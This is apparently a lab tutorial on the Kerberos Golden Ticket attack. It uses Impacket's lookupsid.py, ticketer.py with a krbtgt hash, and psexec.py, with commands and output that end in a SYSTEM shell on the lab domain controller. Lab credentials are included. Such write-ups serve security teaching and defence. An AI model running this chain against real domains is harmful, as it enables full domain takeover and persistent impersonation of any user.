🏆 Golden Ticket

📚 What is a Golden Ticket ?

A Golden Ticket is a type of forged Kerberos Ticket Granting Ticket (TGT) that allows an attacker to gain full, unrestricted access to all services and systems within a Kerberos realm. This attack exploits the fact that all TGTs are encrypted with the krbtgt account's secret key, which is stored within the Key Distribution Center (KDC).

By compromising the krbtgt account, an attacker can create valid TGTs for any user, giving them the ability to impersonate any user in the domain, including domain administrators.

🔓 How Golden Tickets Work

Golden Tickets work by exploiting the Kerberos trust model. Here's how the process typically unfolds :

1. Compromise the Domain: The attacker compromises the krbtgt account hash by gaining administrative privileges on a domain controller or through lateral movement.
2. Generate a Forged TGT: Using the krbtgt account's hash, the attacker can create a forged TGT, giving them access to any service or user in the domain.
3. Maintain Persistence: The attacker can maintain access indefinitely, as long as the krbtgt hash remains unchanged.

🛠️ Crafting a Golden Ticket with Ticketer

Impacket's Ticketer is a powerful Python-based tool designed for crafting Kerberos tickets, including Golden Tickets, directly from the command line. To create a Golden Ticket, we need two key elements: the NTLM hash of the krbtgt account and the SID (Security Identifier) of the target domain.

1. Obtaining the Domain SID

The SID (Security Identifier) is a unique value used to identify objects like users, groups, and computers within a Windows domain. It is essential for crafting a valid Golden Ticket, as it ensures the ticket can be authenticated within the correct domain. To retrieve the SID, we can use Impacket’s lookupsid.py tool by providing valid domain credentials :

lookupsid.py "red.lab"/'qu35t':'Password123'@"192.168.10.100" 0

[*] Brute forcing SIDs at 192.168.10.100
[*] StringBinding ncacn_np:192.168.10.100[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3433736088-161430583-3583626515

2. Forging the Golden Ticket

Once the NTLM hash of the krbtgt account has been obtained and the domain SID is known, we can generate a Golden Ticket for a specific user (such as Administrator) with the following command :

ticketer.py -nthash e54f909c885bab9e50e8a914bb703211 -domain-sid S-1-5-21-3433736088-161430583-3583626515 -domain "red.lab" Administrator

Impacket v0.12.0.dev1+20240808.192004.154de8a5 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for red.lab/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncAsRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncASRepPart
[*] Saving ticket in Administrator.ccache

A ccache file (credential cache) stores Kerberos tickets for the user. It allows authentication to services without needing to re-enter credentials. In this case, the Administrator.ccache file contains the forged Golden Ticket, which can be used for subsequent Kerberos-authenticated requests.

3. Using the Golden Ticket

To use the Golden Ticket, export the KRB5CCNAME environment variable to point to the .ccache file created earlier :

export KRB5CCNAME=/workspace/Administrator.ccache

We can then list the active Kerberos tickets to verify that the Golden Ticket is loaded :

klist

Ticket cache: FILE:/workspace/Administrator.ccache
Default principal: Administrator@red.lab

Valid starting       Expires              Service principal
09/22/2024 15:39:25  09/20/2034 15:39:25  krbtgt/red.lab@red.lab
        renew until 09/20/2034 15:39:25

With the Golden Ticket loaded, we can now access domain resources with elevated privileges. For example, using Impacket's psexec.py tool, we can execute commands remotely on a domain controller (or any other machine) without needing additional credentials :

psexec.py -k -no-pass "Administrator"@"DC01"

Impacket v0.12.0.dev1+20240808.192004.154de8a5 - Copyright 2023 Fortra

[*] Requesting shares on DC01.....
[*] Found writable share ADMIN$
[*] Uploading file YmDWICzQ.exe
[*] Opening SVCManager on DC01.....
[*] Creating service gYWQ on DC01.....
[*] Starting service gYWQ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.587]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>